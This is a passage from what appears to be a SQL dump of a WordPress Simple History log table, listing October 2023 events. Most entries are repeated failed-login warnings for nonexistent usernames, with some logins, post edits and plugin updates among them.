exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39967,'2023-10-26 12:02:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39968,'2023-10-26 12:13:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40513,'2023-10-29 17:37:19','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(40514,'2023-10-29 17:40:32','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40512,'2023-10-29 17:35:11','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40510,'2023-10-29 17:32:07','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(40511,'2023-10-29 17:34:31','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','ae01cbb214c35b4acbd25b15fd66b3e7','wp_user'),(40509,'2023-10-29 16:50:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40508,'2023-10-29 16:04:44','SimpleHistoryLogger','info','Removed {num_rows} events that were older than {days} days','46f9764fb97e58ca0a4270740fe4d70a','wp'),(39603,'2023-10-23 20:14:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39604,'2023-10-23 20:21:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39605,'2023-10-23 20:34:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39606,'2023-10-23 20:46:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39607,'2023-10-23 20:49:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39608,'2023-10-23 20:57:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39609,'2023-10-23 20:59:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39610,'2023-10-23 21:11:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39611,'2023-10-23 21:24:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39612,'2023-10-23 21:37:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39613,'2023-10-23 21:40:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39614,'2023-10-23 21:49:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39615,'2023-10-23 22:02:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39616,'2023-10-23 22:14:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39617,'2023-10-23 22:23:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39618,'2023-10-23 22:26:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39619,'2023-10-23 22:39:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39620,'2023-10-23 22:52:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39621,'2023-10-23 23:04:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39622,'2023-10-23 23:06:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39623,'2023-10-23 23:17:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39624,'2023-10-23 23:29:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39625,'2023-10-23 23:42:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39626,'2023-10-23 23:50:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39627,'2023-10-23 23:54:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39628,'2023-10-24 00:07:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39629,'2023-10-24 00:20:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39630,'2023-10-24 00:33:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39631,'2023-10-24 00:46:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39632,'2023-10-24 00:58:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39633,'2023-10-24 01:11:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39634,'2023-10-24 01:24:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39635,'2023-10-24 01:37:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39636,'2023-10-24 01:50:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39637,'2023-10-24 02:03:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39638,'2023-10-24 02:16:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39639,'2023-10-24 02:29:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39640,'2023-10-24 02:42:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39641,'2023-10-24 02:47:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39642,'2023-10-24 02:54:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39643,'2023-10-24 03:07:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39644,'2023-10-24 03:18:04','SimpleUserLogger','info','Logged in','c3f060ceaa2e121881a9c3a19b7ef67c','wp_user'),(39645,'2023-10-24 03:20:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39646,'2023-10-24 03:21:57','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(39647,'2023-10-24 03:33:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39648,'2023-10-24 03:36:30','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(39649,'2023-10-24 03:41:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39650,'2023-10-24 03:42:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39651,'2023-10-24 03:45:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39652,'2023-10-24 03:46:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39653,'2023-10-24 03:59:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39654,'2023-10-24 04:12:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39655,'2023-10-24 04:25:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39656,'2023-10-24 04:38:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39657,'2023-10-24 04:51:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39658,'2023-10-24 05:04:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39659,'2023-10-24 05:17:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39660,'2023-10-24 05:30:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39661,'2023-10-24 05:43:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39662,'2023-10-24 05:56:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39663,'2023-10-24 06:02:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39664,'2023-10-24 06:09:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39665,'2023-10-24 06:22:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39666,'2023-10-24 06:35:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39667,'2023-10-24 06:48:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39668,'2023-10-24 07:01:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39669,'2023-10-24 07:06:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39670,'2023-10-24 07:15:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39671,'2023-10-24 07:27:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39672,'2023-10-24 07:41:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39673,'2023-10-24 07:54:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39674,'2023-10-24 07:56:25','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','21c68ff140fdcb50a86e58c817848560','wp'),(39675,'2023-10-24 08:07:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39676,'2023-10-24 08:12:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39677,'2023-10-24 08:20:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39678,'2023-10-24 08:26:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39679,'2023-10-24 08:34:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39680,'2023-10-24 08:47:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39681,'2023-10-24 09:00:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39682,'2023-10-24 09:13:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39683,'2023-10-24 09:21:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39684,'2023-10-24 09:26:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39685,'2023-10-24 09:39:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39686,'2023-10-24 09:52:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39687,'2023-10-24 09:59:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39688,'2023-10-24 10:05:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39689,'2023-10-24 10:10:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39690,'2023-10-24 10:19:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39691,'2023-10-24 10:21:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39692,'2023-10-24 10:32:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39693,'2023-10-24 10:33:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39694,'2023-10-24 10:45:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39695,'2023-10-24 10:45:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39696,'2023-10-24 10:57:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39697,'2023-10-24 10:58:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39698,'2023-10-24 11:09:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39699,'2023-10-24 11:11:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39700,'2023-10-24 11:21:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39701,'2023-10-24 11:24:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39702,'2023-10-24 11:33:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39703,'2023-10-24 11:37:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39704,'2023-10-24 11:44:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39705,'2023-10-24 11:50:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39706,'2023-10-24 11:56:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39707,'2023-10-24 12:08:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39708,'2023-10-24 12:20:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39709,'2023-10-24 12:33:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39710,'2023-10-24 12:45:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39711,'2023-10-24 12:57:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39712,'2023-10-24 13:05:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39713,'2023-10-24 13:09:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39714,'2023-10-24 13:21:37','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39715,'2023-10-24 13:33:46','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39716,'2023-10-24 13:45:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39717,'2023-10-24 13:58:14','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39718,'2023-10-24 14:10:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39719,'2023-10-24 14:22:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39720,'2023-10-24 14:35:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39721,'2023-10-24 14:42:29','SimpleUserLogger','info','Logged in','c3f060ceaa2e121881a9c3a19b7ef67c','wp_user'),(39722,'2023-10-24 14:44:22','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','fa8cf74d12a6c2e438fd35ac335fe71b','wp_user'),(39723,'2023-10-24 14:47:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39724,'2023-10-24 14:51:28','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','2864a5f48082c19ee8a94270e7147158','other'),(39725,'2023-10-24 14:59:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39726,'2023-10-24 15:11:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39727,'2023-10-24 15:23:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39728,'2023-10-24 15:35:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39729,'2023-10-24 15:36:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39730,'2023-10-24 15:47:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39731,'2023-10-24 15:56:15','SimplePluginLogger','info','Deactivated plugin \"{plugin_name}\"','2ecfcaaca47fc6dac06e8a137edcb9e0','wp_user'),(39732,'2023-10-24 15:57:49','SimplePluginLogger','info','Installed plugin \"{plugin_name}\"','c8b7738b713bf5e69737e1fc6b349b89','wp_user'),(39733,'2023-10-24 15:57:53','SimplePluginLogger','info','Activated plugin \"{plugin_name}\"','c76a557b2f033b645137cbccb1e5c67b','wp_user'),(39734,'2023-10-24 15:59:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39735,'2023-10-24 16:01:23','SimplePluginLogger','info','Activated plugin \"{plugin_name}\"','e91564f6ec021cc3369855845dda0de8','wp_user'),(39736,'2023-10-24 16:02:27','SimplePluginLogger','info','Deactivated plugin \"{plugin_name}\"','2ecfcaaca47fc6dac06e8a137edcb9e0','wp_user'),(39737,'2023-10-24 16:10:19','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','ebce0253f18c2c62ef79a4633606ce7c','other'),(39738,'2023-10-24 16:10:23','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to version {plugin_version} from {plugin_prev_version}','e4d81aee6bb2c572e6abafa7fb0c99b5','wp'),(39739,'2023-10-24 16:11:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39740,'2023-10-24 16:13:44','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','d39e4c3a7baefbccccbcaa55986c971e','other'),(39741,'2023-10-24 16:14:14','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','077baa5b558405aee6b2c8414ad7431f','other'),(39742,'2023-10-24 16:16:09','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','47306d14f030c6d89b02ecaad41f3ea3','other'),(39743,'2023-10-24 16:24:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39744,'2023-10-24 16:36:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39745,'2023-10-24 16:48:37','AvailableUpdatesLogger','notice','Found an update to plugin \"{plugin_name}\"','53c84e07cc071114a16de3f73182a38e','wp'),(39746,'2023-10-24 16:49:44','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39747,'2023-10-24 16:51:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39748,'2023-10-24 17:02:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39749,'2023-10-24 17:15:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39750,'2023-10-24 17:36:38','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','802be1a08f3d81bcdeec05fc499b437f','other'),(39751,'2023-10-24 18:04:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39752,'2023-10-24 19:18:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39753,'2023-10-24 20:30:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39754,'2023-10-24 22:46:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39755,'2023-10-24 22:52:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39756,'2023-10-24 23:00:55','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','3c2497fe0f8ec6b600c816c5fd889320','wp_user'),(39757,'2023-10-24 23:01:07','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','658ee174aa874590ab36f3db9d3c8b1f','wp_user'),(39758,'2023-10-24 23:01:16','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','04713f7653d158f68217e4942b8be359','wp_user'),(39759,'2023-10-24 23:01:35','SimplePluginLogger','info','Updated plugin \"{plugin_name}\" to {plugin_version} from {plugin_prev_version}','eee2b8b4af58e952776b7f913bcf26c5','wp_user'),(39760,'2023-10-24 23:08:03','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(39761,'2023-10-24 23:56:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39762,'2023-10-25 01:08:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39763,'2023-10-25 02:21:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39764,'2023-10-25 03:33:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39765,'2023-10-25 04:33:36','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39766,'2023-10-25 04:41:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39767,'2023-10-25 05:10:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39768,'2023-10-25 05:49:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39769,'2023-10-25 07:01:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39770,'2023-10-25 08:03:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39771,'2023-10-25 08:14:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39772,'2023-10-25 08:16:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39773,'2023-10-25 08:25:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(39774,'2023-10-25 08:36:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not 